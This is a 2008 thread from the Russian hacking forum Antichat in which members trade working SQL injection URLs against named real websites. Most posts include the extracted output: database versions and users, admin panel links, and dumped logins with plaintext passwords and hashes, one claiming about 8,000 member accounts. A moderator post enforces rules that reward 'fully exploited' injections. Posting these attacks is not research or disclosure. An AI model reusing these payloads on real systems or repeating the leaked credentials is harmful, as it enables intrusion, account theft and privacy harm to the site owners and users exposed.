HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.05.2008, 20:17
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.goalqpc.com/ PR:5
Код:
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+version(),2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*
root:*4148C7277489C55E5A3F49CD1D020FCBE8778C3A
Код:
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat_ws(0x3a,UserEmail,UserPassword),2,3,4,5,6,7,8,9,10,11,12,13,14+from+admin+limit+0,1/*
admin@goalqpc.com:deming123
support@newcastleweb.com:swissthins


Админка:
Цитата:
http://www.goalqpc.com/admin/
Юзеры:
Код:
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat(useremail,0x3a,userpassword),2,3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+8000,1/*
~8000 мемберов, пароли в открытом виде.
 
Ответить с цитированием

  #2  
Старый 23.05.2008, 21:32
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Дом 3

Цитата:
http://www.dom3.ru/cgi-bin/dating.pl?action=search2&mode=html&se=-35'+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35+from+information_schema.tabl es/*&v1=18'&v2=19&re=57&fo=1&dom=1&x=16&y=12
мда
 
Ответить с цитированием

  #3  
Старый 25.05.2008, 01:27
Ymrs
Участник форума
Регистрация: 29.01.2008
Сообщений: 207
Провел на форуме:
725225

Репутация: 450
Отправить сообщение для Ymrs с помощью ICQ
По умолчанию

http://www.verbste.kz
Код:
http://www.verbste.kz/ecommerce/index.php?idr=100+union+select+1,2,3,4,5,6+/*
database: verbste_verbste
user: verbste_verbste@localhost
version: 4.1.22-standard

http://www.kro.su
Код:
http://www.kro.su/news/foto/more/?pid=-1+UNION+SELECT+1,2,3,4,5,6,7/*
user: krosu_user@localhost
database: krosu_main
version: 4.1.22-standard-log

Последний раз редактировалось Ymrs; 25.05.2008 в 02:05..
 
Ответить с цитированием

  #4  
Старый 24.05.2008, 04:37
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.ask4ufe.com
Код:
http://www.ask4ufe.com/transcript.cfm?pid=1+or+1=(SELECT+TOP+1+cast(Username+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+Users)--
 
Ответить с цитированием

  #5  
Старый 24.05.2008, 04:42
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

http://www.sequa.de Pr5
Код:
http://www.sequa.de/index.php?categ=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3/*&parent=0&p=downloads&area=1
 
Ответить с цитированием

  #6  
Старый 24.05.2008, 06:47
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

CinemaBlend.Com

Цитата:
http://www.cinemablend.com/news.php?cid=1+union+select+1/*
 
Ответить с цитированием

  #7  
Старый 24.05.2008, 13:25
†c0(aIn?†
Новичок
Регистрация: 04.05.2008
Сообщений: 16
Провел на форуме:
209786

Репутация: 45
По умолчанию

http://www.pangeaday.org

PR=6

Код:
http://www.pangeaday.org/filmDetail.php?id=2+ union+select+1,2,3,4,5,6,concat(database(),0x3a, version(),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
database: pangea
version: 5.0.22-log
user: dr30628@192.168.1.134
 
Ответить с цитированием

  #8  
Старый 24.05.2008, 15:56
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.austadiums.com/stadiums/stadiums.php?id=-1+union+select+1,2,concat_ws(0x3a,nick,password,em ail),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+from+usuarios+limit+0,1/*
austadiums:auuMTgEV9/KAA

Цитата:
http://www.austadiums.com/stadiums/stadiums.php?id=-1+union+select+1,2,concat_ws(0x3a,user,pass,access ,secret),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9+from+sympoll_auth/*
7c485725fbe136da96b2c9bc8e182999:m1shka505
c27f50fdbc6e40bef29c198d6d209b0c


====================================

Цитата:
http://www.comicus.it/view.php?section=interviste&id=-160+union+select+1,2,3,concat_ws(0x3a,username,pas sword,mail),5,6,7+from+users/*
boss:maerro

====================================

Цитата:
http://www.theshiznit.co.uk/review.php?id=-251+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,nic kname,md5id,password,email),8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4+from+shiznit_users+where+nickname='Bob '/*
Bob:6b333422e6af650594854e99ecca5fc8:shizzy1

====================================

Цитата:
http://www.isra.com/news/page_print.phtml?item=93478+and+1=0+union+select+c oncat_ws(0x3a,user,password,host),2,3,4,5,6,7,8,9+ from+mysql.user/*

kamtec:1b8bd1736ab19985
:kamtec112
http://admin.isra.com/
http://sales.isra.com/admin/index.php
но пасс не идёт

====================================

Цитата:
http://www.amg.com.af/index.php?fuseaction=section.main&id=-13+union+select+1,2,3,concat(username,0x3a,passwor d),5,6,7,8+from+usr+limit+0,1/*
ckaminsky:7b490bbc3fa14869283ee2a6b4c49f1b:vivacolorado
gfranklin:5f4dcc3b5aa765d61d8327deb882cf99:password
 
Ответить с цитированием

www.fondationbrigittebardot.fr PR=5
  #9  
Старый 24.05.2008, 16:50
†c0(aIn?†
Новичок
Регистрация: 04.05.2008
Сообщений: 16
Провел на форуме:
209786

Репутация: 45
По умолчанию www.fondationbrigittebardot.fr PR=5

www.fondationbrigittebardot.fr

PR=5

Код:
http://www.fondationbrigittebardot.fr/site/actu_en.php?id=75018+union+select+AES_DECRYPT(AES_ ENCRYPT(concat(user(),char(58),version(),char(58), database()),0x71),0x71),2/*
database: fonbriba
version: 4.1.11-Debian_4sarge7-log
user: fonbriba@localhost

P.S.Спасибо jokester'y.
 
Ответить с цитированием

  #10  
Старый 24.05.2008, 17:22
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Напомню правила темы:

https://forum.antichat.ru/showpost.p...72&postcount=2

Код:
Выставление репутации в темах:

SQL Инъекции
PHP Иньекции
Пассивные XSS
Активные Xss
Админки

В связи с участившимися случаями накрутки репутации, при выставление репутации в этих темах ограничтесь её кол-вом от 1 до 3.

При оценивание постов этих темах, старайтесь сделать это как можно более рационально - не стоит ставить +3 за каждый пост, выбирайте наиболее объективную оценку.

Несоблюдение этого правила (высталение большего кол-ва репутации) будет говорить о накрутки репутации.

Накрутка репутации будет пресекаться минусами.
Посмотрел репутацию пользователей которые тут постили инъекции:

Код:
+5		SQL Инъекции	22.05.2008 20:12	Ded MustD!e	расти большой)
Поставленно за это: https://forum.antichat.ru/showpost.p...postcount=5565

Код:
+5		SQL Инъекции	20.05.2008 22:44	zl0ba	За активность в теме "SQL inj"
Поставленно за это: https://forum.antichat.ru/showpost.p...postcount=5541

Не знаю что вы нашли там полезного, ровно как и полезного в активности в этой теме в выкладывание инъекций, выводящих версии, но подобные случаи будут считаться накруткой репутации и за это будут выставляться минусы.

Так же напомню что выкладывать нужно только раскрученные инъекции (см первый пост темы).

Не понятно зачем писать ПР/ТИЦ и т.д. но при этом выводить только версию БД, не можете нормально раскрутить инъекцию, но хотите побольше плюсиков?

Тема не для вопросов/ответов, для этого есть другая тема - вопросы/ответы в этой теме считаються оффтопом, а за оффтоп ставяться минусы.


Возмущайтесь в другом месте, обсуждение действий модератора в несоответсвующем разделе будут пресекаться (Const)

Последний раз редактировалось Constantine; 25.05.2008 в 02:42..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ